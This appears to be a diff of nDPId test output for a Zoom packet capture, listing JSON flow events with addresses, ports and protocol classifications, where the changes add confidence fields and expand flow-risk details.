+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520469081,"flow_last_seen":1569520469116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"13.225.84.182","src_port":54798,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466080,"flow_last_seen":1569520472536,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":796,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00619{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1569520473084,"flow_last_seen":1569520473198,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":318,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":61731,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
+00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520469340,"flow_last_seen":1569520469435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":92,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"104.199.65.42","src_port":53867,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
-00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1569520468959,"flow_last_seen":1569520469430,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7299,"flow_avg_l4_payload_len":405,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.238","src_port":54864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520469950,"flow_last_seen":1569520470454,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":17285,"flow_avg_l4_payload_len":576,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.196","src_port":54865,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1569520470022,"flow_last_seen":1569520470628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":19889,"flow_avg_l4_payload_len":602,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"52.202.62.236","src_port":54866,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469221,"flow_last_seen":1569520469399,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469189,"flow_last_seen":1569520469375,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.37.14","src_port":23903,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
+00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1569520469253,"flow_last_seen":1569520469433,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"162.255.38.14","src_port":23903,"dst_port":3479,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Zoom","breed":"Acceptable","category":"Video"}}
 00570{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00647{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1569520470666,"flow_last_seen":1569520470666,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1569520466316,"flow_last_seen":1569520471572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1226,"flow_tot_l4_payload_len":2925,"flow_avg_l4_payload_len":146,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Zoom","breed":"Acceptable","category":"Video"}}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470769,"flow_last_seen":1569520471156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7746,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1569520470776,"flow_last_seen":1569520471159,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6714,"flow_avg_l4_payload_len":239,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470741,"flow_last_seen":1569520470768,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":62563,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
-00598{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520467811,"flow_last_seen":1569520471399,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":1,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","ndpi": {"proto":"IMAPS","breed":"Safe","category":"Email"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520470742,"flow_last_seen":1569520470776,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":58063,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1569520470742,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7752,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1569520470755,"flow_last_seen":1569520471166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7744,"flow_avg_l4_payload_len":258,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":700,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":185,"flow_first_seen":1569520471748,"flow_last_seen":1569520473190,"flow_idle_time":180000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":1029,"flow_tot_l4_payload_len":184465,"flow_avg_l4_payload_len":997,"midstream":0,"ts_msec":1569520473198,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}}
